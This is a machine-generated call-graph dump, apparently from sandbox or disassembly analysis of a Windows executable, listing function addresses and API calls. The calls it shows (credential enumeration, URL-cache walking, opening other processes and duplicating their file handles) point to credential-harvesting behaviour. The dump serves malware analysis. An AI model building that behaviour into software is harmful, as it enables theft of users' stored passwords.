38139->38136 38143->37939 38145 40eb10 38144->38145 38157 40e8e0 38145->38157 38148 40eb6c memcpy memcpy 38149 40ebb7 38148->38149 38149->38148 38150 40ebf2 ??2@YAPAXI ??2@YAPAXI 38149->38150 38153 40d134 16 API calls 38149->38153 38151 40ec2e ??2@YAPAXI 38150->38151 38152 40ec65 38150->38152 38151->38152 38167 40ea7f 38152->38167 38153->38149 38156 402f49 38156->37939 38158 40e8f2 38157->38158 38159 40e8eb ??3@YAXPAX 38157->38159 38160 40e900 38158->38160 38161 40e8f9 ??3@YAXPAX 38158->38161 38159->38158 38162 40e911 38160->38162 38163 40e90a ??3@YAXPAX 38160->38163 38161->38160 38164 40e931 ??2@YAPAXI ??2@YAPAXI 38162->38164 38165 40e921 ??3@YAXPAX 38162->38165 38166 40e92a ??3@YAXPAX 38162->38166 38163->38162 38164->38148 38165->38166 38166->38164 38168 40aa04 free 38167->38168 38169 40ea88 38168->38169 38170 40aa04 free 38169->38170 38171 40ea90 38170->38171 38172 40aa04 free 38171->38172 38173 40ea98 38172->38173 38174 40aa04 free 38173->38174 38175 40eaa0 38174->38175 38176 40a9ce 4 API calls 38175->38176 38177 40eab3 38176->38177 38178 40a9ce 4 API calls 38177->38178 38179 40eabd 38178->38179 38180 40a9ce 4 API calls 38179->38180 38181 40eac7 38180->38181 38182 40a9ce 4 API calls 38181->38182 38183 40ead1 38182->38183 38183->38156 38184->38115 38185->38119 38243 40b2cc 38186->38243 38188 402b0a 38189 40b2cc 27 API calls 38188->38189 38190 402b23 38189->38190 38191 40b2cc 27 API calls 38190->38191 38192 402b3a 38191->38192 38193 40b2cc 27 API calls 38192->38193 38194 402b54 38193->38194 38195 40b2cc 27 API calls 38194->38195 38196 402b6b 38195->38196 38197 40b2cc 27 API calls 38196->38197 38198 402b82 38197->38198 38199 40b2cc 27 API calls 38198->38199 38200 402b99 38199->38200 38201 40b2cc 27 API calls 38200->38201 38202 402bb0 38201->38202 38203 40b2cc 27 API calls 38202->38203 38204 402bc7 38203->38204 38205 40b2cc 27 API calls 38204->38205 38206 402bde 38205->38206 38207 40b2cc 27 API calls 38206->38207 38208 402bf5 38207->38208 38209 40b2cc 27 API calls 38208->38209 38210 402c0c 38209->38210 38211 40b2cc 27 API calls 38210->38211 38212 402c23 38211->38212 38213 40b2cc 27 API calls 38212->38213 38214 402c3a 38213->38214 38215 40b2cc 27 API calls 38214->38215 38216 402c51 38215->38216 38217 40b2cc 27 API calls 38216->38217 38218 402c68 38217->38218 38219 40b2cc 27 API calls 38218->38219 38220 402c7f 38219->38220 38221 40b2cc 27 API calls 38220->38221 38222 402c99 38221->38222 38223 40b2cc 27 API calls 38222->38223 38224 402cb3 38223->38224 38225 40b2cc 27 API calls 38224->38225 38226 402cd5 38225->38226 38227 40b2cc 27 API calls 38226->38227 38228 402cf0 38227->38228 38229 40b2cc 27 API calls 38228->38229 38230 402d0b 38229->38230 38231 40b2cc 27 API calls 38230->38231 38232 402d26 38231->38232 38233 40b2cc 27 API calls 38232->38233 38234 402d3e 38233->38234 38235 40b2cc 27 API calls 38234->38235 38236 402d59 38235->38236 38237 40b2cc 27 API calls 38236->38237 38238 402d78 38237->38238 38239 40b2cc 27 API calls 38238->38239 38240 402d93 38239->38240 38241 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38240->38241 38241->38123 38242->38113 38246 40b58d 38243->38246 38245 40b2d1 38245->38188 38247 40b5a4 GetModuleHandleW FindResourceW 38246->38247 38248 40b62e 38246->38248 38249 40b5c2 LoadResource 38247->38249 38251 40b5e7 38247->38251 38248->38245 38250 40b5d0 SizeofResource LockResource 38249->38250 38249->38251 38250->38251 38251->38248 38259 40afcf 38251->38259 38253 40b608 memcpy 38262 40b4d3 memcpy 38253->38262 38255 40b61e 38263 40b3c1 18 API calls 38255->38263 38257 40b626 38264 40b04b 38257->38264 38260 40b04b ??3@YAXPAX 38259->38260 38261 40afd7 ??2@YAPAXI 38260->38261 38261->38253 38262->38255 38263->38257 38265 40b051 ??3@YAXPAX 38264->38265 38266 40b05f 38264->38266 38265->38266 38266->38248 38267->38131 38269 444a64 FreeLibrary 38268->38269 38270 444a83 38268->38270 38269->38270 38270->38133 38272 4032c4 38271->38272 38273 40b633 free 38272->38273 38274 403316 38273->38274 38291 44553b 38274->38291 38278 403480 38489 40368c 15 API calls 38278->38489 38280 403489 38281 40b633 free 38280->38281 38283 403495 38281->38283 38282 40333c 38282->38278 38284 4033a9 memset memcpy 38282->38284 38285 4033ec wcscmp 38282->38285 38487 4028e7 11 API calls 38282->38487 38488 40f508 6 API calls 38282->38488 38283->38133 38284->38282 38284->38285 38285->38282 38288 403421 _wcsicmp 38288->38282 38289->38133 38290->38134 38292 445548 38291->38292 38293 445599 38292->38293 38490 40c768 38292->38490 38294 4455a8 memset 38293->38294 38301 4457f2 38293->38301 38573 403988 38294->38573 38304 445854 38301->38304 38675 403e2d memset memset memset memset memset 38301->38675 38302 4455e5 38313 445672 38302->38313 38318 44560f 38302->38318 38303 4458bb memset memset 38306 414c2e 17 API calls 38303->38306 38357 4458aa 38304->38357 38698 403c9c memset memset memset memset memset 38304->38698 38309 4458f9 38306->38309 38308 44595e memset memset 38316 414c2e 17 API calls 38308->38316 38317 40b2cc 27 API calls 38309->38317 38311 44558c 38557 444b06 38311->38557 38312 44557a 38312->38311 38771 4136c0 CoTaskMemFree 38312->38771 38584 403fbe memset memset memset memset memset 38313->38584 38314 445a00 memset memset 38721 414c2e 38314->38721 38315 445b22 38321 445bca 38315->38321 38322 445b38 memset memset memset 38315->38322 38326 44599c 38316->38326 38328 445909 38317->38328 38330 4087b3 338 API calls 38318->38330 38320 445849 38787 40b1ab free free 38320->38787 38329 445c8b memset memset 38321->38329 38395 445cf0 38321->38395 38333 445bd4 38322->38333 38334 445b98 38322->38334 38327 40b2cc 27 API calls 38326->38327 38341 4459ac 38327->38341 38338 409d1f 6 API calls 38328->38338 38342 414c2e 17 API calls 38329->38342 38339 445621 38330->38339 38331 44589f 38788 40b1ab free free 38331->38788 38332 445585 38772 41366b FreeLibrary 38332->38772 38348 414c2e 17 API calls 38333->38348 38334->38333 38344 445ba2 38334->38344 38337 403335 38486 4452e5 45 API calls 38337->38486 38352 445919 38338->38352 38773 4454bf 20 API calls 38339->38773 38340 445823 38340->38320 38362 4087b3 338 API calls 38340->38362 38353 409d1f 6 API calls 38341->38353 38354 445cc9 38342->38354 38860 4099c6 wcslen 38344->38860 38345 4456b2 38775 40b1ab free free 38345->38775 38347 40b2cc 27 API calls 38358 445a4f 38347->38358 38349 445be2 38348->38349 38360 40b2cc 27 API calls 38349->38360 38350 445d3d 38380 40b2cc 27 API calls 38350->38380 38351 445d88 memset memset memset 38363 414c2e 17 API calls 38351->38363 38789 409b98 GetFileAttributesW 38352->38789 38364 4459bc 38353->38364 38365 409d1f 6 API calls 38354->38365 38355 445879 38355->38331 38376 4087b3 338 API calls 38355->38376 38357->38303 38381 44594a 38357->38381 38737 409d1f wcslen wcslen 38358->38737 38370 445bf3 38360->38370 38362->38340 38373 445dde 38363->38373 38856 409b98 GetFileAttributesW 38364->38856 38375 445ce1 38365->38375 38366 445bb3 38863 445403 memset 38366->38863 38367 445680 38367->38345 38607 4087b3 memset 38367->38607 38379 409d1f 6 API calls 38370->38379 38371 445928 38371->38381 38790 40b6ef 38371->38790 38382 40b2cc 27 API calls 38373->38382 38880 409b98 GetFileAttributesW 38375->38880 38376->38355 38378 40b2cc 27 API calls 38387 445a94 38378->38387 38389 445c07 38379->38389 38390 445d54 _wcsicmp 38380->38390 38381->38308 38394 4459ed 38381->38394 38393 445def 38382->38393 38383 4459cb 38383->38394 38403 40b6ef 253 API calls 38383->38403 38742 40ae18 38387->38742 38388 44566d 38388->38301 38658 413d4c 38388->38658 38399 445389 259 API calls 38389->38399 38400 445d71 38390->38400 38463 445d67 38390->38463 38392 445665 38774 40b1ab free free 38392->38774 38401 409d1f 6 API calls 38393->38401 38394->38314 38394->38315 38395->38337 38395->38350 38395->38351 38396 445389 259 API calls 38396->38321 38405 445c17 38399->38405 38881 445093 23 API calls 38400->38881 38408 445e03 38401->38408 38403->38394 38404 4456d8 38410 40b2cc 27 API calls 38404->38410 38411 40b2cc 27 API calls 38405->38411 38407 44563c 38407->38392 38413 4087b3 338 API calls 38407->38413 38882 409b98 GetFileAttributesW 38408->38882 38409 40b6ef 253 API calls 38409->38337 38415 4456e2 38410->38415 38416 445c23 38411->38416 38412 445d83 38412->38337 38413->38407 38776 413fa6 _wcsicmp _wcsicmp 38415->38776 38420 409d1f 6 API calls 38416->38420 38418 445e12 38424 445e6b 38418->38424 38431 40b2cc 27 API calls 38418->38431 38422 445c37 38420->38422 38421 4456eb 38427 4456fd memset memset memset memset 38421->38427 38428 4457ea 38421->38428 38429 445389 259 API calls 38422->38429 38423 445b17 38857 40aebe 38423->38857 38884 445093 23 API calls 38424->38884 38777 409c70 wcscpy wcsrchr 38427->38777 38780 413d29 38428->38780 38434 445c47 38429->38434 38435 445e33 38431->38435 38432 445e7e 38437 445f67 38432->38437 38440 40b2cc 27 API calls 38434->38440 38441 409d1f 6 API calls 38435->38441 38446 40b2cc 27 API calls 38437->38446 38438 445ab2 memset 38442 40b2cc 27 API calls 38438->38442 38444 445c53 38440->38444 38445 445e47 38441->38445 38447 445aa1 38442->38447 38443 409c70 2 API calls 38448 44577e 38443->38448 38449 409d1f 6 API calls 38444->38449 38883 409b98 GetFileAttributesW 38445->38883 38451 445f73 38446->38451 38447->38423 38447->38438 38452 409d1f 6 API calls 38447->38452 38749 40add4 38447->38749 38754 445389 38447->38754 38763 40ae51 38447->38763 38453 409c70 2 API calls 38448->38453 38454 445c67 38449->38454 38456 409d1f 6 API calls 38451->38456 38452->38447 38457 44578d 38453->38457 38458 445389 259 API calls 38454->38458 38455 445e56 38455->38424 38461 445e83 memset 38455->38461 38459 445f87 38456->38459 38457->38428 38465 40b2cc 27 API calls 38457->38465 38458->38321 38887 409b98 GetFileAttributesW 38459->38887 38464 40b2cc 27 API calls 38461->38464 38463->38337 38463->38409 38466 445eab 38464->38466 38467 4457a8 38465->38467 38468 409d1f 6 API calls 38466->38468 38469 409d1f 6 API calls 38467->38469 38470 445ebf 38468->38470 38471 4457b8 38469->38471 38472 40ae18 9 API calls 38470->38472 38779 409b98 GetFileAttributesW 38471->38779 38482 445ef5 38472->38482 38474 4457c7 38474->38428 38476 4087b3 338 API calls 38474->38476 38475 40ae51 9 API calls 38475->38482 38476->38428 38477 445f5c 38479 40aebe FindClose 38477->38479 38478 40add4 2 API calls 38478->38482 38479->38437 38480 40b2cc 27 API calls 38480->38482 38481 409d1f 6 API calls 38481->38482 38482->38475 38482->38477 38482->38478 38482->38480 38482->38481 38484 445f3a 38482->38484 38885 409b98 GetFileAttributesW 38482->38885 38886 445093 23 API calls 38484->38886 38486->38282 38487->38288 38488->38282 38489->38280 38491 40c775 38490->38491 38888 40b1ab free free 38491->38888 38493 40c788 38889 40b1ab free free 38493->38889 38495 40c790 38890 40b1ab free free 38495->38890 38497 40c798 38498 40aa04 free 38497->38498 38499 40c7a0 38498->38499 38891 40c274 memset 38499->38891 38504 40a8ab 9 API calls 38505 40c7c3 38504->38505 38506 40a8ab 9 API calls 38505->38506 38507 40c7d0 38506->38507 38920 40c3c3 38507->38920 38511 40c877 38520 40bdb0 38511->38520 38512 40c86c 38962 4053fe 39 API calls 38512->38962 38513 40c7e5 38513->38511 38513->38512 38519 40c634 50 API calls 38513->38519 38945 40a706 38513->38945 38519->38513 39245 404363 38520->39245 38523 40bf5d 39265 40440c 38523->39265 38524 40bdee 38524->38523 38528 40b2cc 27 API calls 38524->38528 38525 40bddf CredEnumerateW 38525->38524 38529 40be02 wcslen 38528->38529 38529->38523 38536 40be1e 38529->38536 38530 40be26 wcsncmp 38530->38536 38533 40be7d memset 38534 40bea7 memcpy 38533->38534 38533->38536 38535 40bf11 wcschr 38534->38535 38534->38536 38535->38536 38536->38523 38536->38530 38536->38533 38536->38534 38536->38535 38537 40b2cc 27 API calls 38536->38537 38539 40bf43 LocalFree 38536->38539 39268 40bd5d 28 API calls 38536->39268 39269 404423 38536->39269 38538 40bef6 _wcsnicmp 38537->38538 38538->38535 38538->38536 38539->38536 38540 4135f7 39284 4135e0 38540->39284 38543 40b2cc 27 API calls 38544 41360d 38543->38544 38545 40a804 8 API calls 38544->38545 38546 413613 38545->38546 38547 41361b 38546->38547 38548 41363e 38546->38548 38549 40b273 27 API calls 38547->38549 38550 4135e0 FreeLibrary 38548->38550 38551 413625 GetProcAddress 38549->38551 38552 413643 38550->38552 38551->38548 38553 413648 38551->38553 38552->38312 38554 413658 38553->38554 38555 4135e0 FreeLibrary 38553->38555 38554->38312 38556 413666 38555->38556 38556->38312 39287 4449b9 38557->39287 38560 444c1f 38560->38293 38561 4449b9 42 API calls 38563 444b4b 38561->38563 38562 444c15 38565 4449b9 42 API calls 38562->38565 38563->38562 39308 444972 GetVersionExW 38563->39308 38565->38560 38566 444b99 memcmp 38571 444b8c 38566->38571 38567 444c0b 39312 444a85 42 API calls 38567->39312 38571->38566 38571->38567 39309 444aa5 42 API calls 38571->39309 39310 40a7a0 GetVersionExW 38571->39310 39311 444a85 42 API calls 38571->39311 38574 40399d 38573->38574 39313 403a16 38574->39313 38576 403a09 39327 40b1ab free free 38576->39327 38578 403a12 wcsrchr 38578->38302 38579 4039a3 38579->38576 38582 4039f4 38579->38582 39324 40a02c CreateFileW 38579->39324 38582->38576 38583 4099c6 2 API calls 38582->38583 38583->38576 38585 414c2e 17 API calls 38584->38585 38586 404048 38585->38586 38587 414c2e 17 API calls 38586->38587 38588 404056 38587->38588 38589 409d1f 6 API calls 38588->38589 38590 404073 38589->38590 38591 409d1f 6 API calls 38590->38591 38592 40408e 38591->38592 38593 409d1f 6 API calls 38592->38593 38594 4040a6 38593->38594 38595 403af5 20 API calls 38594->38595 38596 4040ba 38595->38596 38597 403af5 20 API calls 38596->38597 38598 4040cb 38597->38598 39354 40414f memset 38598->39354 38600 404140 39368 40b1ab free free 38600->39368 38601 4040ec memset 38605 4040e0 38601->38605 38603 404148 38603->38367 38604 4099c6 2 API calls 38604->38605 38605->38600 38605->38601 38605->38604 38606 40a8ab 9 API calls 38605->38606 38606->38605 39381 40a6e6 WideCharToMultiByte 38607->39381 38609 4087ed 39382 4095d9 memset 38609->39382 38612 408809 memset memset memset memset memset 38613 40b2cc 27 API calls 38612->38613 38614 4088a1 38613->38614 38615 409d1f 6 API calls 38614->38615 38616 4088b1 38615->38616 38617 40b2cc 27 API calls 38616->38617 38618 4088c0 38617->38618 38619 409d1f 6 API calls 38618->38619 38620 4088d0 38619->38620 38621 40b2cc 27 API calls 38620->38621 38622 4088df 38621->38622 38623 409d1f 6 API calls 38622->38623 38624 4088ef 38623->38624 38625 40b2cc 27 API calls 38624->38625 38626 4088fe 38625->38626 38627 409d1f 6 API calls 38626->38627 38639 408953 38639->38367 38659 40b633 free 38658->38659 38660 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38659->38660 38661 413f00 Process32NextW 38660->38661 38662 413da5 OpenProcess 38661->38662 38663 413f17 CloseHandle 38661->38663 38664 413eb0 38662->38664 38665 413df3 memset 38662->38665 38663->38404 38664->38661 38667 413ebf free 38664->38667 38668 4099f4 3 API calls 38664->38668 39807 413f27 38665->39807 38667->38664 38668->38664 38669 413e37 GetModuleHandleW 38671 413e46 GetProcAddress 38669->38671 38672 413e1f 38669->38672 38671->38672 38672->38669 39812 413959 38672->39812 39828 413ca4 38672->39828 38674 413ea2 CloseHandle 38674->38664 38676 414c2e 17 API calls 38675->38676 38677 403eb7 38676->38677 38678 414c2e 17 API calls 38677->38678 38679 403ec5 38678->38679 38680 409d1f 6 API calls 38679->38680 38681 403ee2 38680->38681 38682 409d1f 6 API calls 38681->38682 38683 403efd 38682->38683 38684 409d1f 6 API calls 38683->38684 38685 403f15 38684->38685 38686 403af5 20 API calls 38685->38686 38687 403f29 38686->38687 38688 403af5 20 API calls 38687->38688 38689 403f3a 38688->38689 38690 40414f 33 API calls 38689->38690 38696 403f4f 38690->38696 38691 403faf 39842 40b1ab free free 38691->39842 38693 403f5b memset 38693->38696 38694 403fb7 38694->38340 38695 4099c6 2 API calls 38695->38696 38696->38691 38696->38693 38696->38695 38697 40a8ab 9 API calls 38696->38697 38697->38696 38699 414c2e 17 API calls 38698->38699 38700 403d26 38699->38700 38701 414c2e 17 API calls 38700->38701 38702 403d34 38701->38702 38703 409d1f 6 API calls 38702->38703 38704 403d51 38703->38704 38705 409d1f 6 API calls 38704->38705 38706 403d6c 38705->38706 38707 409d1f 6 API calls 38706->38707 38708 403d84 38707->38708 38709 403af5 20 API calls 38708->38709 38710 403d98 38709->38710 38711 403af5 20 API calls 38710->38711 38712 403da9 38711->38712 38713 40414f 33 API calls 38712->38713 38718 403dbe 38713->38718 38714 403e1e 39843 40b1ab free free 38714->39843 38716 403dca memset 38716->38718 38717 403e26 38717->38355 38718->38714 38718->38716 38719 4099c6 2 API calls 38718->38719 38720 40a8ab 9 API calls 38718->38720 38719->38718 38720->38718 38722 414b81 9 API calls 38721->38722 38724 414c40 38722->38724 38723 414c73 memset 38726 414c94 38723->38726 38724->38723 39844 409cea 38724->39844 39847 414592 RegOpenKeyExW 38726->39847 38729 414c64 SHGetSpecialFolderPathW 38731 414d0b 38729->38731 38730 414cc1 38732 414cf4 wcscpy 38730->38732 39848 414bb0 wcscpy 38730->39848 38731->38347 38732->38731 38734 414cd2 39849 4145ac RegQueryValueExW 38734->39849 38736 414ce9 RegCloseKey 38736->38732 38738 409d62 38737->38738 38739 409d43 wcscpy 38737->38739 38738->38378 38740 409719 2 API calls 38739->38740 38741 409d51 wcscat 38740->38741 38741->38738 38743 40aebe FindClose 38742->38743 38744 40ae21 38743->38744 38745 4099c6 2 API calls 38744->38745 38746 40ae35 38745->38746 38747 409d1f 6 API calls 38746->38747 38748 40ae49 38747->38748 38748->38447 38750 40ade0 38749->38750 38753 40ae0f 38749->38753 38751 40ade7 wcscmp 38750->38751 38750->38753 38752 40adfe wcscmp 38751->38752 38751->38753 38752->38753 38753->38447 38755 40ae18 9 API calls 38754->38755 38760 4453c4 38755->38760 38756 40ae51 9 API calls 38756->38760 38757 4453f3 38759 40aebe FindClose 38757->38759 38758 40add4 2 API calls 38758->38760 38761 4453fe 38759->38761 38760->38756 38760->38757 38760->38758 38762 445403 254 API calls 38760->38762 38761->38447 38762->38760 38764 40ae7b FindNextFileW 38763->38764 38765 40ae5c FindFirstFileW 38763->38765 38766 40ae94 38764->38766 38767 40ae8f 38764->38767 38765->38766 38769 40aeb6 38766->38769 38770 409d1f 6 API calls 38766->38770 38768 40aebe FindClose 38767->38768 38768->38766 38769->38447 38770->38769 38771->38332 38772->38311 38773->38407 38774->38388 38775->38388 38776->38421 38778 409c89 38777->38778 38778->38443 38779->38474 38781 413d39 38780->38781 38782 413d2f FreeLibrary 38780->38782 38783 40b633 free 38781->38783 38782->38781 38784 413d42 38783->38784 38785 40b633 free 38784->38785 38786 413d4a 38785->38786 38786->38301 38787->38304 38788->38357 38789->38371 38791 44db70 38790->38791 38792 40b6fc memset 38791->38792 38793 409c70 2 API calls 38792->38793 38794 40b732 wcsrchr 38793->38794 38795 40b743 38794->38795 38796 40b746 memset 38794->38796 38795->38796 38797 40b2cc 27 API calls 38796->38797 38798 40b76f 38797->38798 38799 409d1f 6 API calls 38798->38799 38800 40b783 38799->38800 39850 409b98 GetFileAttributesW 38800->39850 38802 40b792 38803 40b7c2 38802->38803 38804 409c70 2 API calls 38802->38804 39851 40bb98 38803->39851 38806 40b7a5 38804->38806 38808 40b2cc 27 API calls 38806->38808 38812 40b7b2 38808->38812 38809 40b837 CloseHandle 38811 40b83e memset 38809->38811 38810 40b817 38813 409a45 3 API calls 38810->38813 39884 40a6e6 WideCharToMultiByte 38811->39884 38815 409d1f 6 API calls 38812->38815 38816 40b827 CopyFileW 38813->38816 38815->38803 38816->38811 38817 40b866 38818 444432 121 API calls 38817->38818 38820 40b879 38818->38820 38819 40bad5 38822 40baeb 38819->38822 38823 40bade DeleteFileW 38819->38823 38820->38819 38821 40b273 27 API calls 38820->38821 38824 40b89a 38821->38824 38825 40b04b ??3@YAXPAX 38822->38825 38823->38822 38826 438552 134 API calls 38824->38826 38827 40baf3 38825->38827 38828 40b8a4 38826->38828 38827->38381 38829 40bacd 38828->38829 38831 4251c4 137 API calls 38828->38831 38830 443d90 111 API calls 38829->38830 38830->38819 38854 40b8b8 38831->38854 38832 40bac6 39894 424f26 123 API calls 38832->39894 38833 40b8bd memset 39885 425413 17 API calls 38833->39885 38836 425413 17 API calls 38836->38854 38839 40a71b MultiByteToWideChar 38839->38854 38840 40a734 MultiByteToWideChar 38840->38854 38843 40b9b5 memcmp 38843->38854 38844 4099c6 2 API calls 38844->38854 38845 404423 38 API calls 38845->38854 38848 40bb3e memset memcpy 39895 40a734 MultiByteToWideChar 38848->39895 38849 4251c4 137 API calls 38849->38854 38851 40bb88 LocalFree 38851->38854 38854->38832 38854->38833 38854->38836 38854->38839 38854->38840 38854->38843 38854->38844 38854->38845 38854->38848 38854->38849 38855 40ba5f memcmp 38854->38855 39886 4253ef 16 API calls 38854->39886 39887 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38854->39887 39888 4253af 17 API calls 38854->39888 39889 4253cf 17 API calls 38854->39889 39890 447280 memset 38854->39890 39891 447960 memset memcpy memcpy memcpy 38854->39891 39892 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38854->39892 39893 447920 memcpy memcpy memcpy 38854->39893 38855->38854 38856->38383 38858 40aed1 38857->38858 38859 40aec7 FindClose 38857->38859 38858->38315 38859->38858 38861 4099d7 38860->38861 38862 4099da memcpy 38860->38862 38861->38862 38862->38366 38864 40b2cc 27 API calls 38863->38864 38865 44543f 38864->38865 38866 409d1f 6 API calls 38865->38866 38867 44544f 38866->38867 39983 409b98 GetFileAttributesW 38867->39983 38869 44545e 38870 445476 38869->38870 38871 40b6ef 253 API calls 38869->38871 38872 40b2cc 27 API calls 38870->38872 38871->38870 38873 445482 38872->38873 38874 409d1f 6 API calls 38873->38874 38875 445492 38874->38875 39984 409b98 GetFileAttributesW 38875->39984 38877 4454a1 38878 4454b9 38877->38878 38879 40b6ef 253 API calls 38877->38879 38878->38396 38879->38878 38880->38395 38881->38412 38882->38418 38883->38455 38884->38432 38885->38482 38886->38482 38887->38463 38888->38493 38889->38495 38890->38497 38892 414c2e 17 API calls 38891->38892 38893 40c2ae 38892->38893 38963 40c1d3 38893->38963 38898 40c3be 38915 40a8ab 38898->38915 38899 40afcf 2 API calls 38900 40c2fd FindFirstUrlCacheEntryW 38899->38900 38901 40c3b6 38900->38901 38902 40c31e wcschr 38900->38902 38903 40b04b ??3@YAXPAX 38901->38903 38904 40c331 38902->38904 38905 40c35e FindNextUrlCacheEntryW 38902->38905 38903->38898 38907 40a8ab 9 API calls 38904->38907 38905->38902 38906 40c373 GetLastError 38905->38906 38908 40c3ad FindCloseUrlCache 38906->38908 38909 40c37e 38906->38909 38910 40c33e wcschr 38907->38910 38908->38901 38911 40afcf 2 API calls 38909->38911 38910->38905 38912 40c34f 38910->38912 38913 40c391 FindNextUrlCacheEntryW 38911->38913 38914 40a8ab 9 API calls 38912->38914 38913->38902 38913->38908 38914->38905 39172 40a97a 38915->39172 38918 40a8cc 38918->38504 38919 40a8d0 7 API calls 38919->38918 39177 40b1ab free free 38920->39177 38922 40c3dd 38923 40b2cc 27 API calls 38922->38923 38924 40c3e7 38923->38924 39178 414592 RegOpenKeyExW 38924->39178 38926 40c3f4 38927 40c50e 38926->38927 38928 40c3ff 38926->38928 38942 405337 38927->38942 38929 40a9ce 4 API calls 38928->38929 38930 40c418 memset 38929->38930 39179 40aa1d 38930->39179 38933 40c471 38935 40c47a _wcsupr 38933->38935 38934 40c505 RegCloseKey 38934->38927 38936 40a8d0 7 API calls 38935->38936 38937 40c498 38936->38937 38938 40a8d0 7 API calls 38937->38938 38939 40c4ac memset 38938->38939 38940 40aa1d 38939->38940 38941 40c4e4 RegEnumValueW 38940->38941 38941->38934 38941->38935 39181 405220 38942->39181 38946 4099c6 2 API calls 38945->38946 38947 40a714 _wcslwr 38946->38947 38948 40c634 38947->38948 39238 405361 38948->39238 38951 40c65c wcslen 39241 4053b6 39 API calls 38951->39241 38952 40c71d wcslen 38952->38513 38954 40c677 38955 40c713 38954->38955 39242 40538b 39 API calls 38954->39242 39244 4053df 39 API calls 38955->39244 38958 40c6a5 38958->38955 38959 40c6a9 memset 38958->38959 38960 40c6d3 38959->38960 39243 40c589 44 API calls 38960->39243 38962->38511 38964 40ae18 9 API calls 38963->38964 38970 40c210 38964->38970 38965 40ae51 9 API calls 38965->38970 38966 40c264 38967 40aebe FindClose 38966->38967 38969 40c26f 38967->38969 38968 40add4 2 API calls 38968->38970 38975 40e5ed memset memset 38969->38975 38970->38965 38970->38966 38970->38968 38971 40c231 _wcsicmp 38970->38971 38972 40c1d3 35 API calls 38970->38972 38971->38970 38973 40c248 38971->38973 38972->38970 38988 40c084 22 API calls 38973->38988 38976 414c2e 17 API calls 38975->38976 38977 40e63f 38976->38977 38978 409d1f 6 API calls 38977->38978 38979 40e658 38978->38979 38989 409b98 GetFileAttributesW 38979->38989 38981 40e667 38982 40e680 38981->38982 38983 409d1f 6 API calls 38981->38983 38990 409b98 GetFileAttributesW 38982->38990 38983->38982 38985 40e68f 38986 40c2d8 38985->38986 38991 40e4b2 38985->38991 38986->38898 38986->38899 38988->38970 38989->38981 38990->38985 39012 40e01e 38991->39012 38993 40e593 38994 40e5b0 38993->38994 38995 40e59c DeleteFileW 38993->38995 38996 40b04b ??3@YAXPAX 38994->38996 38995->38994 38998 40e5bb 38996->38998 38997 40e521 38997->38993 39035 40e175 38997->39035 39000 40e5c4 CloseHandle 38998->39000 39001 40e5cc 38998->39001 39000->39001 39003 40b633 free 39001->39003 39002 40e573 39004 40e584 39002->39004 39005 40e57c CloseHandle 39002->39005 39006 40e5db 39003->39006 39078 40b1ab free free 39004->39078 39005->39004 39008 40b633 free 39006->39008 39009 40e5e3 39008->39009 39009->38986 39011 40e540 39011->39002 39055 40e2ab 39011->39055 39079 406214 39012->39079 39015 40e16b 39015->38997 39018 40afcf 2 API calls 39019 40e08d OpenProcess 39018->39019 39020 40e0a4 GetCurrentProcess DuplicateHandle 39019->39020 39024 40e152 39019->39024 39021 40e0d0 GetFileSize 39020->39021 39022 40e14a CloseHandle 39020->39022 39115 409a45 GetTempPathW 39021->39115 39022->39024 39023 40e160 39027 40b04b ??3@YAXPAX 39023->39027 39024->39023 39026 406214 22 API calls 39024->39026 39026->39023 39027->39015 39028 40e0ea 39118 4096dc CreateFileW 39028->39118 39030 40e0f1 CreateFileMappingW 39031 40e140 CloseHandle CloseHandle 39030->39031 39032 40e10b MapViewOfFile 39030->39032 39031->39022 39033 40e13b CloseHandle 39032->39033 39034 40e11f WriteFile UnmapViewOfFile 39032->39034 39033->39031 39034->39033 39036 40e18c 39035->39036 39119 406b90 39036->39119 39039 40e1a7 memset 39045 40e1e8 39039->39045 39040 40e299 39151 4069a3 39040->39151 39046 40e283 39045->39046 39047 40dd50 _wcsicmp 39045->39047 39053 40e244 _snwprintf 39045->39053 39129 406e8f 39045->39129 39158 40742e 8 API calls 39045->39158 39159 40aae3 wcslen wcslen _memicmp 39045->39159 39160 406b53 SetFilePointerEx ReadFile 39045->39160 39048 40e291 39046->39048 39049 40e288 free 39046->39049 39047->39045 39050 40aa04 free 39048->39050 39049->39048 39050->39040 39054 40a8d0 7 API calls 39053->39054 39054->39045 39056 40e2c2 39055->39056 39057 406b90 11 API calls 39056->39057 39058 40e2d3 39057->39058 39059 40e4a0 39058->39059 39061 406e8f 13 API calls 39058->39061 39064 40e489 39058->39064 39067 40dd50 _wcsicmp 39058->39067 39073 40e3e0 memcpy 39058->39073 39074 40e3fb memcpy 39058->39074 39075 40e3b3 wcschr 39058->39075 39076 40e416 memcpy 39058->39076 39077 40e431 memcpy 39058->39077 39161 40dd50 _wcsicmp 39058->39161 39170 40742e 8 API calls 39058->39170 39171 406b53 SetFilePointerEx ReadFile 39058->39171 39060 4069a3 2 API calls 39059->39060 39062 40e4ab 39060->39062 39061->39058 39062->39011 39065 40aa04 free 39064->39065 39066 40e491 39065->39066 39066->39059 39068 40e497 free 39066->39068 39067->39058 39068->39059 39070 40e376 memset 39162 40aa29 39070->39162 39073->39058 39074->39058 39075->39058 39076->39058 39077->39058 39078->38993 39080 406294 CloseHandle 39079->39080 39081 406224 39080->39081 39082 4096c3 CreateFileW 39081->39082 39083 40622d 39082->39083 39084 406281 GetLastError 39083->39084 39085 40a2ef ReadFile 39083->39085 39087 40625a 39084->39087 39086 406244 39085->39086 39086->39084 39088 40624b 39086->39088 39087->39015 39090 40dd85 memset 39087->39090 39088->39087 39089 406777 19 API calls 39088->39089 39089->39087 39091 409bca GetModuleFileNameW 39090->39091 39092 40ddbe CreateFileW 39091->39092 39095 40ddf1 39092->39095 39093 40afcf ??2@YAPAXI ??3@YAXPAX 39093->39095 39094 41352f 9 API calls 39094->39095 39095->39093 39095->39094 39096 40de0b NtQuerySystemInformation 39095->39096 39097 40de3b CloseHandle GetCurrentProcessId 39095->39097 39096->39095 39098 40de54 39097->39098 39099 413d4c 46 API calls 39098->39099 39107 40de88 39099->39107 39100 40e00c 39101 413d29 free FreeLibrary 39100->39101 39102 40e014 39101->39102 39102->39015 39102->39018 39103 40dea9 _wcsicmp 39104 40dee7 OpenProcess 39103->39104 39105 40debd _wcsicmp 39103->39105 39104->39107 39105->39104 39106 40ded0 _wcsicmp 39105->39106 